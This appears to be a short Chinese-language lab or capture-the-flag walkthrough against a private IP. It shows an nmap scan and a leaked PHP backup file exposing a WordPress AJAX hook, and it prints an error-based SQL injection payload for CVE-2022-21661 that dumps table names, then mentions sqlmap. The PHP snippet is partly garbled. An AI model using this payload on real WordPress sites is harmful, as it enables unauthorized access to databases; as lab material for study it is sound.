$ sudo nmap -sS 10.20.24.35/32
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 01:12 EST
Nmap scan report for 10.20.24.35
Host is up (0.00015s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Step2:对目录进行扫描可以发现敏感信息泄露,这个为后面的SQL注入漏洞买下伏笔。
http://10.20.24.35/function.php.bak
function wp_query_test(){
_POST['data']);
c, true);
d);
wp_die();
}
add_action('wp_ajax_nopriv_test','wp_query_test',1);r
根据WordPress的版本5.8.2存在cve-2022-21661漏洞,根据泄露出来的铭感信息可以知道请
求的key。构造payload得到。
action=test&data={"tax_query":[{"field":"term_taxonomy_id","terms":["1)
and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from
information_schema.tables where table_schema=database())))-- "]}]}
通过SQLmap直接进行爆破
网友评论